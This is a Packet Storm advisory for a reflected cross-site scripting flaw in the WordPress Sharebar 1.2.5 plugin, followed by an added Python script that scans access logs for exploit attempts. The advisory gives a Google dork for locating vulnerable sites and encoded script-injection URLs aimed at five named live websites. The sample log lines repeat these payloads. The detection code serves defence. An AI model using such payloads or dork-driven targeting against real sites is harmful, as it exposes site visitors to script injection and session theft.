WordPress Sharebar 1.2.5 Cross Site Scripting

2013-09-24T00:00:00
ID PACKETSTORM:123365
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2013-09-24T00:00:00

Description

                                        
`#######################################################################  
# Exploit Title : WordPress Sharebar plugin Cross Site Scripting Vulnerability  
#  
# Exploit Author : Ashiyane Digital Security Team  
#  
# Google Dork : inurl:/wp-content/plugins/sharebar  
#  
# Date: 2013/09/24  
#  
# Vendor Homepage : http://wordpress.org/plugins/sharebar  
#  
# Software Link : http://downloads.wordpress.org/plugin/sharebar.zip  
#  
# Version : 1.2.5  
#  
# Tested on: Windows  
#  
##############  
#  
#Location: Site//wp-content/plugins/sharebar/sharebar-admin.php?page=[xss]  
#  
##############  
##############  
# Demo:  
#  
#  
http://www.andreafelder.com/wp-content/plugins/sharebar/sharebar-admin.php?page=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
#  
#  
http://www.buyukanadolutipmerkezi.com/wp-content/plugins/sharebar/sharebar-admin.php?page=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
#  
#  
http://www.baxterbowlingcostarica.com/wp-content/plugins/sharebar/sharebar-admin.php?page=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
#  
#  
http://www.intikala.com/design/KellyTirman/wp-content/plugins/sharebar/sharebar-admin.php?page=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
#  
#  
http://www.kirktalon.com/kirksite2011/wp-content/plugins/sharebar/sharebar-admin.php?page=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E  
#  
##############  
#  
# Discovered By : ACC3SS  
#  
##############  
`
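
Requests matching the location given in this advisory can be found in web server access logs by decoding the `page` parameter and checking it for markup characters. The following is an added example, not part of the original advisory or of the plugin's code; the combined log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Path from the advisory; endswith() also covers subdirectory installs.
SHAREBAR_ADMIN = "/wp-content/plugins/sharebar/sharebar-admin.php"
# Characters that let a reflected value break out of an HTML attribute or tag.
MARKUP = re.compile(r"[<>\"']")
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding (e.g. %253C) up to a fixed depth."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_page_values(log_lines):
    """Return (line_number, decoded page value) for requests matching the advisory."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.lower().endswith(SHAREBAR_ADMIN):
            continue
        for raw in parse_qs(target.query, keep_blank_values=True).get("page", []):
            value = decode_fully(raw)
            if MARKUP.search(value):
                hits.append((number, value))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Sep/2013:10:00:01 +0000] "GET /wp-content/plugins/sharebar/sharebar-admin.php?page=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E HTTP/1.1" 200 512',
    '192.0.2.11 - - [24/Sep/2013:10:00:05 +0000] "GET /index.php?page=2 HTTP/1.1" 200 9000',
    '192.0.2.12 - - [24/Sep/2013:10:00:09 +0000] "GET /blog/wp-content/plugins/sharebar/sharebar-admin.php?page=%2522%253E%253Cimg%2520src%253Dx%253E HTTP/1.1" 200 512',
    '192.0.2.13 - - [24/Sep/2013:10:00:12 +0000] "GET /wp-content/plugins/sharebar/sharebar-admin.php?page=sharebar HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for number, value in suspicious_page_values(SAMPLE_LOG):
        print(f"line {number}: page={value!r}")
```

A hit only shows that markup was sent to the endpoint; whether it was reflected unescaped depends on the installed plugin version.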